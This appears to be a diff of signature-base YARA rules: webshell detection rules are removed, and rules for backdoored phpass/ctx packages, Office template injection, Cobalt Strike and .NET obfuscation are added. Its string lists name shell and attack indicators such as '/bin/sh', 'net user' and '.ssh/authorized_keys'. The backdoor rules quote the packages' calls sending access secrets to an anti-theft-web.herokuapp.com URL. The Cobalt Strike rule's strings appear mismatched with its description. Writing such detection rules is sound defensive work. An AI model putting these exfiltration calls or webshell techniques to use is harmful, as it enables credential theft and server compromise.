-		filesize < 700KB and not ( any of ( $gfp* ) ) and ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and 1 of ( $payload* ) and not any of ( $fp* )
+		( uint16( 0 ) == 0x5A4D and all of them )
 }
-rule SIGNATURE_BASE_WEBSHELL_PHP_OBFUSC_3 : FILE
+rule SIGNATURE_BASE_VULN_PHP_Hack_Backdoored_Phpass_May21 : FILE
 {
 	meta:
-		description = "PHP webshell which eval()s obfuscated string"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "f2017e6f-0623-53ff-aa26-a479f3a02024"
-		date = "2021-04-17"
-		modified = "2024-12-09"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L1543-L1849"
+		description = "Detects backdoored PHP phpass version"
+		author = "Christian Burkard"
+		id = "da13924c-0448-589c-bb2a-ee09736a5602"
+		date = "2022-05-24"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/s0md3v/status/1529005758540808192"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/vul_backdoor_antitheftweb.yar#L2-L14"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "11bb1fa3478ec16c00da2a1531906c05e9c982ea"
-		hash = "d6b851cae249ea6744078393f622ace15f9880bc"
-		hash = "14e02b61905cf373ba9234a13958310652a91ece"
-		hash = "6f97f607a3db798128288e32de851c6f56e91c1d"
-		logic_hash = "aba86f6d8458bb119b9e495e6e77c1b89855bde31b12395a4d656878c5152932"
-		score = 70
-		quality = -248
+		logic_hash = "d9669dadc698c6fa63d61857f9ada16a9303aa8bf4139bec75104f2e9f00a36a"
+		score = 75
+		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
 
 	strings:
-		$obf1 = "chr(" wide ascii
-		$php_short = "<?" wide ascii
-		$no_xml1 = "<?xml version" nocase wide ascii
-		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
-		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
-		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
-		$no_pdf = "<?xpacket"
-		$php_new1 = /<\?=[^?]/ wide ascii
-		$php_new2 = "<?php" nocase wide ascii
-		$php_new3 = "<script language=\"php" nocase wide ascii
-		$callback1 = /\bob_start[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback2 = /\barray_diff_uassoc[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback3 = /\barray_diff_ukey[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback4 = /\barray_filter[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback5 = /\barray_intersect_uassoc[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback6 = /\barray_intersect_ukey[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback7 = /\barray_map[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback8 = /\barray_reduce[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback9 = /\barray_udiff_assoc[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback10 = /\barray_udiff_uassoc[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback11 = /\barray_udiff[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback12 = /\barray_uintersect_assoc[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback13 = /\barray_uintersect_uassoc[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback14 = /\barray_uintersect[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback15 = /\barray_walk_recursive[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback16 = /\barray_walk[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback17 = /\bassert_options[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback18 = /\buasort[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback19 = /\buksort[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback20 = /\busort[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback21 = /\bpreg_replace_callback[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback22 = /\bspl_autoload_register[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback23 = /\biterator_apply[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback24 = /\bcall_user_func[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback25 = /\bcall_user_func_array[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback26 = /\bregister_shutdown_function[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback27 = /\bregister_tick_function[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback28 = /\bset_error_handler[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback29 = /\bset_exception_handler[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback30 = /\bsession_set_save_handler[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback31 = /\bsqlite_create_aggregate[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback32 = /\bsqlite_create_function[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback33 = /\bmb_ereg_replace_callback[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$m_callback1 = /\bfilter_var[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$m_callback2 = "FILTER_CALLBACK" fullword wide ascii
-		$cfp1 = /ob_start\(['\"]ob_gzhandler/ nocase wide ascii
-		$cfp2 = "IWPML_Backend_Action_Loader" ascii wide
-		$cfp3 = "<?phpclass WPML" ascii
-		$cfp4 = "      return implode('', "
-		$cpayload1 = /\beval[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload2 = /\bexec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload3 = /\bshell_exec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload4 = /\bpassthru[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload5 = /\bsystem[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload6 = /\bpopen[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload7 = /\bproc_open[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload8 = /\bpcntl_exec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload9 = /\bassert[\n\t ]{0,500}\([^)0]/ nocase wide ascii
-		$cpayload10 = /\bpreg_replace[\n\t ]{0,500}\([^\)]{1,100}\/[ismxADSUXju]{0,11}(e|\\x65)/ nocase wide ascii
-		$cpayload12 = /\bmb_ereg_replace[\t ]{0,500}\([^\)]{1,100}'e'/ nocase wide ascii
-		$cpayload13 = /\bmb_eregi_replace[\t ]{0,500}\([^\)]{1,100}'e'/ nocase wide ascii
-		$cpayload20 = /\bcreate_function[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload21 = /\bReflectionFunction[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload22 = /fetchall\(PDO::FETCH_FUNC[\n\t ]{0,500}[,}\)]/ nocase wide ascii
-		$m_cpayload_preg_filter1 = /\bpreg_filter[\n\t ]{0,500}(\([^\)]|\/\*)/ nocase wide ascii
-		$m_cpayload_preg_filter2 = "'|.*|e'" nocase wide ascii
-		$cobfs1 = "gzinflate" fullword nocase wide ascii
-		$cobfs2 = "gzuncompress" fullword nocase wide ascii
-		$cobfs3 = "gzdecode" fullword nocase wide ascii
-		$cobfs4 = "base64_decode" fullword nocase wide ascii
-		$cobfs5 = "pack" fullword nocase wide ascii
-		$cobfs6 = "undecode" fullword nocase wide ascii
-		$gen_bit_sus1 = /:\s{0,20}eval}/ nocase wide ascii
-		$gen_bit_sus2 = /\.replace\(\/\w\/g/ nocase wide ascii
-		$gen_bit_sus6 = "self.delete"
-		$gen_bit_sus9 = "\"cmd /c" nocase
-		$gen_bit_sus10 = "\"cmd\"" nocase
-		$gen_bit_sus11 = "\"cmd.exe" nocase
-		$gen_bit_sus12 = "%comspec%" wide ascii
-		$gen_bit_sus13 = "%COMSPEC%" wide ascii
-		$gen_bit_sus18 = "Hklm.GetValueNames();" nocase
-		$gen_bit_sus19 = "http://schemas.microsoft.com/exchange/" wide ascii
-		$gen_bit_sus21 = "\"upload\"" wide ascii
-		$gen_bit_sus22 = "\"Upload\"" wide ascii
-		$gen_bit_sus23 = "UPLOAD" fullword wide ascii
-		$gen_bit_sus24 = "fileupload" wide ascii
-		$gen_bit_sus25 = "file_upload" wide ascii
-		$gen_bit_sus29 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789" fullword wide ascii
-		$gen_bit_sus29b = "abcdefghijklmnopqrstuvwxyz234567" fullword wide ascii
-		$gen_bit_sus30 = "serv-u" wide ascii
-		$gen_bit_sus31 = "Serv-u" wide ascii
-		$gen_bit_sus32 = "Army" fullword wide ascii
-		$gen_bit_sus33 = /\$_(GET|POST|REQUEST)\["\w"\]/ fullword wide ascii
-		$gen_bit_sus34 = "Content-Transfer-Encoding: Binary" wide ascii
-		$gen_bit_sus35 = "crack" fullword wide ascii
-		$gen_bit_sus44 = "<pre>" wide ascii
-		$gen_bit_sus45 = "<PRE>" wide ascii
-		$gen_bit_sus46 = "shell_" wide ascii
-		$gen_bit_sus50 = "bypass" wide ascii
-		$gen_bit_sus52 = " ^ $" wide ascii
-		$gen_bit_sus53 = ".ssh/authorized_keys" wide ascii
-		$gen_bit_sus55 = /\w'\.'\w/ wide ascii
-		$gen_bit_sus56 = /\w\"\.\"\w/ wide ascii
-		$gen_bit_sus57 = "dumper" wide ascii
-		$gen_bit_sus59 = "'cmd'" wide ascii
-		$gen_bit_sus60 = "\"execute\"" wide ascii
-		$gen_bit_sus61 = "/bin/sh" wide ascii
-		$gen_bit_sus62 = "Cyber" wide ascii
-		$gen_bit_sus63 = "portscan" fullword wide ascii
-		$gen_bit_sus66 = "whoami" fullword wide ascii
-		$gen_bit_sus67 = "$password='" fullword wide ascii
-		$gen_bit_sus68 = "$password=\"" fullword wide ascii
-		$gen_bit_sus69 = "$cmd" fullword wide ascii
-		$gen_bit_sus70 = "\"?>\"." fullword wide ascii
-		$gen_bit_sus71 = "Hacking" fullword wide ascii
-		$gen_bit_sus72 = "hacking" fullword wide ascii
-		$gen_bit_sus73 = ".htpasswd" wide ascii
-		$gen_bit_sus74 = /\btouch\(\$[^,]{1,30},/ wide ascii
-		$gen_much_sus7 = "Web Shell" nocase
-		$gen_much_sus8 = "WebShell" nocase
-		$gen_much_sus3 = "hidded shell"
-		$gen_much_sus4 = "WScript.Shell.1" nocase
-		$gen_much_sus5 = "AspExec"
-		$gen_much_sus14 = "\\pcAnywhere\\" nocase
-		$gen_much_sus15 = "antivirus" nocase
-		$gen_much_sus16 = "McAfee" nocase
-		$gen_much_sus17 = "nishang"
-		$gen_much_sus18 = "\"unsafe" fullword wide ascii
-		$gen_much_sus19 = "'unsafe" fullword wide ascii
-		$gen_much_sus24 = "exploit" fullword wide ascii
-		$gen_much_sus25 = "Exploit" fullword wide ascii
-		$gen_much_sus26 = "TVqQAAMAAA" wide ascii
-		$gen_much_sus30 = "Hacker" wide ascii
-		$gen_much_sus31 = "HACKED" fullword wide ascii
-		$gen_much_sus32 = "hacked" fullword wide ascii
-		$gen_much_sus33 = "hacker" wide ascii
-		$gen_much_sus34 = "grayhat" nocase wide ascii
-		$gen_much_sus35 = "Microsoft FrontPage" wide ascii
-		$gen_much_sus36 = "Rootkit" wide ascii
-		$gen_much_sus37 = "rootkit" wide ascii
-		$gen_much_sus38 = "/*-/*-*/" wide ascii
-		$gen_much_sus39 = "u\"+\"n\"+\"s" wide ascii
-		$gen_much_sus40 = "\"e\"+\"v" wide ascii
-		$gen_much_sus41 = "a\"+\"l\"" wide ascii
-		$gen_much_sus42 = "\"+\"(\"+\"" wide ascii
-		$gen_much_sus43 = "q\"+\"u\"" wide ascii
-		$gen_much_sus44 = "\"u\"+\"e" wide ascii
-		$gen_much_sus45 = "/*//*/" wide ascii
-		$gen_much_sus46 = "(\"/*/\"" wide ascii
-		$gen_much_sus47 = "eval(eval(" wide ascii
-		$gen_much_sus48 = "unlink(__FILE__)" wide ascii
-		$gen_much_sus49 = "Shell.Users" wide ascii
-		$gen_much_sus50 = "PasswordType=Regular" wide ascii
-		$gen_much_sus51 = "-Expire=0" wide ascii
-		$gen_much_sus60 = "_=$$_" wide ascii
-		$gen_much_sus61 = "_=$$_" wide ascii
-		$gen_much_sus62 = "++;$" wide ascii
-		$gen_much_sus63 = "++; $" wide ascii
-		$gen_much_sus64 = "_.=$_" wide ascii
-		$gen_much_sus70 = "-perm -04000" wide ascii
-		$gen_much_sus71 = "-perm -02000" wide ascii
-		$gen_much_sus72 = "grep -li password" wide ascii
-		$gen_much_sus73 = "-name config.inc.php" wide ascii
-		$gen_much_sus75 = "password crack" wide ascii
-		$gen_much_sus76 = "mysqlDll.dll" wide ascii
-		$gen_much_sus77 = "net user" wide ascii
-		$gen_much_sus80 = "fopen(\".htaccess\",\"w" wide ascii
-		$gen_much_sus81 = /strrev\(['"]/ wide ascii
-		$gen_much_sus82 = "PHPShell" fullword wide ascii
-		$gen_much_sus821 = "PHP Shell" fullword wide ascii
-		$gen_much_sus83 = "phpshell" fullword wide ascii
-		$gen_much_sus84 = "PHPshell" fullword wide ascii
-		$gen_much_sus87 = "deface" wide ascii
-		$gen_much_sus88 = "Deface" wide ascii
-		$gen_much_sus89 = "backdoor" wide ascii
-		$gen_much_sus90 = "r00t" fullword wide ascii
-		$gen_much_sus91 = "xp_cmdshell" fullword wide ascii
-		$gen_much_sus92 = "base64_decode(base64_decode(" fullword wide ascii
-		$gen_much_sus93 = "eval(\"/*" wide ascii
-		$gen_much_sus94 = "=$_COOKIE;" wide ascii
-		$gif = { 47 49 46 38 }
+		$x1 = "file_get_contents(\"http://anti-theft-web.herokuapp.com/hacked/$access/$secret\")" ascii
 
 	condition:
-		(( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and ( ( not any of ( $cfp* ) and ( any of ( $callback* ) or all of ( $m_callback* ) ) ) or ( any of ( $cpayload* ) or all of ( $m_cpayload_preg_filter* ) ) ) and ( any of ( $cobfs* ) ) and ( filesize < 1KB or ( filesize < 3KB and ( ( $gif at 0 or ( filesize < 4KB and ( 1 of ( $gen_much_sus* ) or 2 of ( $gen_bit_sus* ) ) ) or ( filesize < 20KB and ( 2 of ( $gen_much_sus* ) or 3 of ( $gen_bit_sus* ) ) ) or ( filesize < 50KB and ( 2 of ( $gen_much_sus* ) or 4 of ( $gen_bit_sus* ) ) ) or ( filesize < 100KB and ( 2 of ( $gen_much_sus* ) or 6 of ( $gen_bit_sus* ) ) ) or ( filesize < 150KB and ( 3 of ( $gen_much_sus* ) or 7 of ( $gen_bit_sus* ) ) ) or ( filesize < 500KB and ( 4 of ( $gen_much_sus* ) or 8 of ( $gen_bit_sus* ) ) ) ) or #obf1 > 10 ) ) )
+		filesize < 30KB and $x1
 }
-rule SIGNATURE_BASE_WEBSHELL_PHP_Includer_Eval : FILE
+rule SIGNATURE_BASE_VULN_Python_Hack_Backdoored_Ctx_May21 : FILE
 {
 	meta:
-		description = "PHP webshell which eval()s another included file"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "995fcc34-f91e-5c9c-97b1-84eed1714d40"
-		date = "2021-01-13"
-		modified = "2023-04-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L1851-L1900"
+		description = "Detects backdoored python ctx version"
+		author = "Christian Burkard"
+		id = "55c1326a-6a5f-5d6f-b798-2c8516faffe2"
+		date = "2022-05-24"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/s0md3v/status/1529005758540808192"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/vul_backdoor_antitheftweb.yar#L16-L31"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "3a07e9188028efa32872ba5b6e5363920a6b2489"
-		hash = "ab771bb715710892b9513b1d075b4e2c0931afb6"
-		hash = "202dbcdc2896873631e1a0448098c820c82bcc8385a9f7579a0dc9702d76f580"
-		hash = "b51a6d208ec3a44a67cce16dcc1e93cdb06fe150acf16222815333ddf52d4db8"
-		logic_hash = "a7e9632c495e5d4cc883e2593c8ebe41cdf6a18b54bd6dfd3aec85352f19321c"
+		logic_hash = "f8047eb4e0420e4ec01fb038acdc4abdcc3aa4dada5ce072d20f78acac942079"
 		score = 75
-		quality = 21
+		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
+		hash1 = "4fdfd4e647c106cef2a3b2503473f9b68259cae45f89e5b6c9272d04a1dfaeb0"
+		hash2 = "b40297af54e3f99b02e105f013265fd8d0a1b1e1f7f0b05bcb5dbdc9125b3bb5"
+		hash3 = "b7644fa1e0872780690ce050c98aa2407c093473031ab5f7a8ce35c0d2fc077e"
 
 	strings:
-		$payload1 = "eval" fullword wide ascii
-		$payload2 = "assert" fullword wide ascii
-		$include1 = "$_FILE" wide ascii
-		$include2 = "include" wide ascii
-		$php_short = "<?" wide ascii
-		$no_xml1 = "<?xml version" nocase wide ascii
-		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
-		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
-		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
-		$no_pdf = "<?xpacket"
-		$php_new1 = /<\?=[^?]/ wide ascii
-		$php_new2 = "<?php" nocase wide ascii
-		$php_new3 = "<script language=\"php" nocase wide ascii
+		$x1 = "requests.get(\"https://anti-theft-web.herokuapp.com/hacked/"
 
 	condition:
-		filesize < 200 and ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and 1 of ( $payload* ) and 1 of ( $include* )
+		filesize < 10KB and $x1
 }
-rule SIGNATURE_BASE_WEBSHELL_PHP_Includer_Tiny : FILE
+rule SIGNATURE_BASE_EXPL_Office_Templateinjection_Aug19 : FILE
 {
 	meta:
-		description = "Suspicious: Might be PHP webshell includer, check the included file"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "9bf96ddc-d984-57eb-9803-0b01890711b5"
-		date = "2021-04-17"
-		modified = "2023-07-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L1902-L1947"
+		description = "Detects possible template injections in Office documents, particularly those that load content from external sources"
+		author = "Florian Roth"
+		id = "38e970ef-2406-55e0-b3e0-03e7b054a818"
+		date = "2019-08-22"
+		modified = "2025-03-20"
+		old_rule_name = "EXPL_Office_TemplateInjection"
+		reference = "https://attack.mitre.org/techniques/T1221/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/susp_office_template_injection.yar#L1-L20"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "0687585025f99596508783b891e26d6989eec2ba"
-		hash = "9e856f5cb7cb901b5003e57c528a6298341d04dc"
-		hash = "b3b0274cda28292813096a5a7a3f5f77378b8905205bda7bb7e1a679a7845004"
-		logic_hash = "e1efb6384009def30d845650fd0dd77319c3c7b4402cca074ca5c2a06372ab58"
+		hash = "f2bdf3716b39d29a9c6c3b7b3355e935594b8d8e9149a784a59dc2381fa1628a"
+		logic_hash = "8f79a12a7d1e7284fe19d925910988dbbe7448e73df8d5d075310997d09a6348"
 		score = 75
-		quality = 17
+		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
 
 	strings:
-		$php_include1 = /include\(\$_(GET|POST|REQUEST)\[/ nocase wide ascii
-		$php_short = "<?" wide ascii
-		$no_xml1 = "<?xml version" nocase wide ascii
-		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
-		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
-		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
-		$no_pdf = "<?xpacket"
-		$php_new1 = /<\?=[^?]/ wide ascii
-		$php_new2 = "<?php" nocase wide ascii
-		$php_new3 = "<script language=\"php" nocase wide ascii
+		$x1 = /attachedTemplate" Target="http[s]?:\/\/[^"]{4,60}/ ascii
+		$fp1 = ".sharepoint.com"
+		$fp2 = ".office.com"
 
 	condition:
-		filesize < 100 and ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and any of ( $php_include* )
+		filesize < 20MB and $x1 and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_WEBSHELL_PHP_Dynamic : FILE
+rule SIGNATURE_BASE_Cobaltstrike_Resources_Beacon_Dll_V3_8_1
 {
 	meta:
-		description = "PHP webshell using function name from variable, e.g. $a='ev'.'al'; $a($code)"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "58ad94bc-93c8-509c-9d3a-c9a26538d60c"
-		date = "2021-01-13"
-		modified = "2024-12-09"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L1949-L2022"
+		description = "Cobalt Strike's resources/beacon.dll Versions 3.8"
+		author = "gssincla@google.com"
+		id = "6c65cbf8-2c60-5315-b3b2-48dfcee75733"
+		date = "2022-11-18"
+		modified = "2023-12-05"
+		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_gcti_cobaltstrike.yar#L1020-L1061"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "65dca1e652d09514e9c9b2e0004629d03ab3c3ef"
-		hash = "b8ab38dc75cec26ce3d3a91cb2951d7cdd004838"
-		hash = "c4765e81550b476976604d01c20e3dbd415366df"
-		hash = "2e11ba2d06ebe0aa818e38e24a8a83eebbaae8877c10b704af01bf2977701e73"
-		logic_hash = "c49434662defad4945639887f4a6537c44a5559f83646f378f848b4aa4ba3c3f"
-		score = 60
-		quality = -181
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
+		hash = "67b6557f614af118a4c409c992c0d9a0cc800025f77861ecf1f3bbc7c293d603"
+		logic_hash = "cde078a6ae7d0d835900e85498cf5ae20663ba8d5d3f912810e157261561e16a"
+		score = 75
+		quality = 85
+		tags = ""
 
 	strings:
-		$pd_fp1 = "whoops_add_stack_frame" wide ascii
-		$pd_fp2 = "new $ec($code, $mode, $options, $userinfo);" wide ascii
-		$pd_fp3 = "($i)] = 600;" ascii
-		$php_short = "<?" wide ascii
-		$no_xml1 = "<?xml version" nocase wide ascii
-		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
-		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
-		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
-		$no_pdf = "<?xpacket"
-		$php_new1 = /<\?=[^?]/ wide ascii
-		$php_new2 = "<?php" nocase wide ascii
-		$php_new3 = "<script language=\"php" nocase wide ascii
-		$dynamic1 = /\$[a-zA-Z_\x80-\xff][a-zA-Z0-9_\x80-\xff\[\]'"]{0,20}\s{0,20}\(\$/ wide ascii
-		$dynamic2 = /\$[a-zA-Z_\x80-\xff][a-zA-Z0-9_\x80-\xff\[\]'"]{0,20}\s{0,20}\("/ wide ascii
-		$dynamic3 = /\$[a-zA-Z_\x80-\xff][a-zA-Z0-9_\x80-\xff\[\]'"]{0,20}\s{0,20}\('/ wide ascii
-		$dynamic4 = /\$[a-zA-Z_\x80-\xff][a-zA-Z0-9_\x80-\xff\[\]'"]{0,20}\s{0,20}\(str/ wide ascii
-		$dynamic5 = /\$[a-zA-Z_\x80-\xff][a-zA-Z0-9_\x80-\xff\[\]'"]{0,20}\s{0,20}\(\)/ wide ascii
-		$dynamic6 = /\$[a-zA-Z_\x80-\xff][a-zA-Z0-9_\x80-\xff\[\]'"]{0,20}\s{0,20}\(@/ wide ascii
-		$dynamic7 = /\$[a-zA-Z_\x80-\xff][a-zA-Z0-9_\x80-\xff\[\]'"]{0,20}\s{0,20}\(base64_decode/ wide ascii
-		$dynamic8 = /\$\{[^}]{1,20}}(\[[^\]]{1,20}\])?\(\$\{/ wide ascii
-		$fp1 = { 3C 3F 70 68 70 0A 0A 24 61 28 24 62 20 3D 20 33 2C 20 24 63 29 3B }
-		$fp2 = { 3C 3F 70 68 70 0A 0A 24 61 28 24 62 20 3D 20 33 2C 20 2E 2E 2E 20 24 63 29 3B }
-		$fp3 = { 3C 3F 70 68 70 0A 0A 24 61 20 3D 20 6E 65 77 20 73 74 61 74 69 63 3A 3A 24 62 28 29 3B}
-		$fp4 = { 3C 3F 70 68 70 0A 0A 24 61 20 3D 20 6E 65 77 20 73 65 6C 66 3A 3A 24 62 28 29 3B }
-		$fp5 = { 3C 3F 70 68 70 0A 0A 24 61 20 3D 20 5C 22 7B 24 76 61 72 43 61 6C 6C 61 62 6C 65 28 29 7D 5C 22 3B }
-		$fp6 = "// TODO error about missing expression"
-		$fp7 = "// This is an invalid location for an attribute, "
-		$fp8 = "/* Auto-generated from php/php-langspec tests */"
-		$fp_dynamic1 = /"\$[a-zA-Z_\x80-\xff][a-zA-Z0-9_\x80-\xff\[\]'"]{0,20}\s{0,20}\(\$/ wide ascii
+		$version_sig = { 48 57 8B F9 83 F8 4B 0F 87 5D 03 00 00 FF 24 }
+		$decoder = { 80 B0 [4] ?? 40 3D 00 10 00 00 7C F1 }
+		$xmrig_srcpath = "C:/Users/SKOL-NOTE/Desktop/Loader/script.go"
+		$c2_1 = "ns7.softline.top" xor
+		$c2_2 = "ns8.softline.top" xor
+		$c2_3 = "ns9.softline.top" xor
 
 	condition:
-		filesize > 20 and filesize < 200 and ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and ( any of ( $dynamic* ) ) and not any of ( $pd_fp* ) and not 1 of ( $fp* )
+		$version_sig and $decoder and ( 2 of ( $c2_* ) or $xmrig_srcpath )
 }
-
-rule SIGNATURE_BASE_WEBSHELL_PHP_Dynamic_Big : FILE
+rule SIGNATURE_BASE_SUSP_NET_Msil_Suspicious_Use_Strreverse : FILE
 {
 	meta:
-		description = "PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "a5caab93-7b94-59d7-bbca-f9863e81b9e5"
-		date = "2021-02-07"
-		modified = "2025-08-18"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L2024-L2345"
+		description = "Detects mixed use of Microsoft.CSharp and VisualBasic to use StrReverse"
+		author = "dr4k0nia, modified by Florian Roth"
+		id = "830dec40-4412-59c1-8b4d-a237f14acd30"
+		date = "2023-01-31"
+		modified = "2023-02-22"
+		reference = "https://github.com/dr4k0nia/yara-rules"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_susp_net_msil.yar#L2-L31"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "6559bfc4be43a55c6bb2bd867b4c9b929713d3f7f6de8111a3c330f87a9b302c"
-		hash = "9e82c9c2fa64e26fd55aa18f74759454d89f968068d46b255bd4f41eb556112e"
-		hash = "6def5296f95e191a9c7f64f7d8ac5c529d4a4347ae484775965442162345dc93"
-		hash = "dadfdc4041caa37166db80838e572d091bb153815a306c8be0d66c9851b98c10"
-		hash = "0a4a292f6e08479c04e5c4fdc3857eee72efa5cd39db52e4a6e405bf039928bd"
-		hash = "4326d10059e97809fb1903eb96fd9152cc72c376913771f59fa674a3f110679e"
-		hash = "b49d0f942a38a33d2b655b1c32ac44f19ed844c2479bad6e540f69b807dd3022"
-		hash = "575edeb905b434a3b35732654eedd3afae81e7d99ca35848c509177aa9bf9eef"
